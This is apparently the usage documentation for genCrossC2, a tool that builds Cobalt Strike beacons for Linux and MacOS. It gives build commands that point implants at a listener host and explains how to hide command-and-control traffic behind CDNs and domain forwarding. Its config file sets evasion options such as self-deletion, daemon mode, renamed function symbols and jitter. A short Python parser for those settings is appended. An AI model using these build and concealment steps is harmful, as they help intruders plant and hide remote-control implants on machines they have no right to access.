genCrossC2
when the teamserver is configured with c2profile, it can be selected:
- automatically parse c2profile (recommend🔥)
- generate the rebind library corresponding to c2profile
When using domain forwarding or other forwarding methods, in addition to automatically parsing the c2profile or specifying a rebind library, you also need to pay attention to the C2_HOST field when generating:
- When the service provider verifies the request type from the HTTP request content, specify the CDN IP list:
genCrossC2 1.1.1.1,2.2.2.2,3.3.3.3,xxx.xxx.xxx.xx ...
- When the CDN server verifies through SNI (CDN operators such as Cloudflare), specify the domain name bound to the CDN:
genCrossC2 c2.domain.com ...
The build command is:
genCrossC2 <listener-ip/domain> <listener-port> <beacon_keys> <rebind_library;config.ini;c2profile.profile> <target_platform> <target_arch>
<listener-ip/domain>: HOST connected by C2
<listener-port>: PORT connected by C2
<beacon_keys>: Hidden files on teamserver `.cobaltstrike.beacon_keys`
<rebind_library;config.ini;c2profile.profile>: Multiple configuration parameters separated by the `;` symbol; an unused parameter can be given as `null` or left empty
<rebind_library>: Dynamic library for custom protocols
<config.ini>: In-depth configuration for controlling beacon behavior, such as function symbol change, startup self-deletion, background mode operation, sleep time, etc.
<c2profile.profile>: For c2profile that needs automatic parsing
<target_platform>: target platform, MacOS/Linux
<target_arch>: target platform architecture x86/x64
The c2profile can be passed directly for automatic parsing, without implementing a rebind library:
$ genCrossC2 www.example.com 443 .cobaltstrike.beacon_keys ";;c2profile.profile" Linux x64 beacon.out
When there are multiple available sections in c2profile.profile, you can use the @ symbol to select the part that needs to be parsed:
$ genCrossC2 www.example.com 443 .cobaltstrike.beacon_keys ";;c2profile.profile@unix-section" Linux x64 beacon.out
You can also write the traffic encapsulation functions for sending packets yourself; in that case you need to implement the relevant encryption and decryption functions inside the rebind library.
- 📖wiki
- Demo:
- C2Profile demo 📄demo_c2profile.profile 📄demo_c2profil_rebind.c
- UDP communication demo 📄demo_udp_proxy_server.c 📄demo_udp_rebind.c
- Issues: 🏷issue #65 (Example of data transfer and c2profile field correspondence), 🏷issue #89 (Data processing example)
CrossC2/autoRebind can be used to automatically parse a Malleable C2 profile and generate the source code of the rebind library.
Supports all codec algorithms of CobaltStrike: base64, base64url, mask, netbios, netbiosu
A config.ini can be added on top of all the previous usages:
1. genCrossC2 127.0.0.1 5555 .cobaltstrike.beacon_keys null;config.ini MacOS x64 beacon.out
2. genCrossC2 127.0.0.1 5555 .cobaltstrike.beacon_keys c2profile.so;config.ini MacOS x64 beacon.out
3. genCrossC2 127.0.0.1 5555 .cobaltstrike.beacon_keys ;config.ini;c2profile.profile MacOS x64 beacon.out
config.ini:
# Hook function symbols and global configuration of the beacon itself
[c2_config]
# hook function
# initialization stage: void cc2_init() {}
cc2_init = aa1
# Error-reconnection stage, receives the reconnection count: void cc2_retryConnect(int retryCount) {}
cc2_retryConnect = bb
# Function name customization for protocol rebinding library
cc2_rebind_get_protocol = cc
cc2_rebind_post_protocol = dd
cc2_rebind_http_get_send = ee3
cc2_rebind_http_get_recv = ff
cc2_rebind_http_post_send = gg
cc2_rebind_http_post_recv = hh
# global configuration
# automatically delete after running
cc2_auto_delete = false
# background process
cc2_daemon = false
# sleep time (10sec)
sleeptime = 10
# heartbeat jitter time
jitter = 37
# data submission jitter time
data_jitter = 100
# name of the pipe created for tasks (default joblist)
job_pipe_name = joblist
# name of the pipe the task runs on (default .syspipe)
process_pipe_name = sys_pipe
# requested dns service
dns_server = 8.8.8.8
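As an added illustration (not part of CrossC2), the following Python parses the `<rebind_library;config.ini;c2profile.profile>` argument described above (including `null`/empty slots and the `@section` selector) and a config.ini in the format shown, so the options a build uses can be recorded and reviewed; the sample config is constructed from the page's example.

```python
import configparser

# Keys whose values are function symbol names (hook / rebind customisation).
HOOK_KEYS = (
    "cc2_init", "cc2_retryConnect", "cc2_rebind_get_protocol",
    "cc2_rebind_post_protocol", "cc2_rebind_http_get_send",
    "cc2_rebind_http_get_recv", "cc2_rebind_http_post_send", "cc2_rebind_http_post_recv",
)

def _slot(value: str):
    """An empty slot or the literal 'null' means the parameter is not used."""
    value = value.strip()
    return None if value in ("", "null") else value

def parse_config_arg(arg: str) -> dict:
    """Split the ';'-separated argument; 'file@section' selects a profile section."""
    parts = (arg.split(";") + ["", "", ""])[:3]
    rebind, ini, profile = (_slot(p) for p in parts)
    section = None
    if profile and "@" in profile:
        profile, section = profile.split("@", 1)
    return {"rebind_library": rebind, "config_ini": ini,
            "c2profile": profile, "profile_section": section}

def _coerce(value: str):
    """'true'/'false' -> bool, digit strings -> int, anything else stays a str."""
    if value.lower() in ("true", "false"):
        return value.lower() == "true"
    return int(value) if value.isdigit() else value

def parse_config_ini(text: str) -> dict:
    """Return the hook symbol map and the typed global settings of [c2_config]."""
    parser = configparser.ConfigParser()
    parser.optionxform = str  # keep key case, e.g. cc2_retryConnect
    parser.read_string(text)
    section = parser["c2_config"]
    hooks = {k: v for k, v in section.items() if k in HOOK_KEYS}
    settings = {k: _coerce(v) for k, v in section.items() if k not in HOOK_KEYS}
    return {"hooks": hooks, "settings": settings}

# Constructed sample, abbreviated from the config.ini shown on the page.
SAMPLE_CONFIG_INI = """\
[c2_config]
cc2_init = aa1
cc2_retryConnect = bb
cc2_daemon = false
sleeptime = 10
dns_server = 8.8.8.8
"""
```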